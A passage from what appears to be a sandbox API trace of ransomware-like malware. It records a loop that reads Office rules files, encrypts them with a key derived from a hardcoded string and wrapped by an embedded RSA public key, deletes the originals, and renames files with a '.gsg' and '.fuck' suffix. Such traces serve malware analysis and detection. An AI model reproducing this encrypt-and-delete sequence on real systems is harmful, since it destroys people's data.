pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.010] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.011] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.011] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.011] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.011] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.012] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.013] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x221, lpOverlapped=0x0) returned 1 [0269.013] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x221, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x230) returned 1 [0269.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x230, lpOverlapped=0x0) returned 1 [0269.013] CloseHandle (hObject=0x5d48) returned 1 [0269.013] CloseHandle (hObject=0x5d3c) returned 1 [0269.013] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.018] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.019] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml.gsg")) returned 1 [0269.020] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml.fuck")) returned 1 [0269.022] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0269.022] CryptDestroyKey (hKey=0x2e7eb80) returned 1 [0269.022] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.022] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.022] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0269.022] GetLastError () returned 0x0 [0269.022] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\onenote.exe_rules.xml")) returned 0x20 [0269.023] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0269.024] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\onenote.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.025] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\onenote.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.026] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0269.026] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0269.029] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0269.029] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0269.029] CryptHashData (hHash=0x2fa788, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.029] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa788, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa548) returned 1 [0269.029] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.029] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0269.029] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f26918) returned 1 [0269.030] CryptImportPublicKeyInfo (in: hCryptProv=0x2f26918, dwCertEncodingType=0x1, pInfo=0x2f30960*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30990*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30998*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa708) returned 1 [0269.030] CryptEncrypt (in: hKey=0x2fa708, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0269.030] CryptEncrypt (in: hKey=0x2fa708, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26120*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f26120*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0269.030] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f26120*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f26120*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0269.031] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.048] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.048] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.060] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.061] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.061] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.062] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.062] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.062] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.062] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.062] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.062] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.062] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.062] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.062] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.062] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.062] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.062] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.063] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.063] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.063] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.063] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, 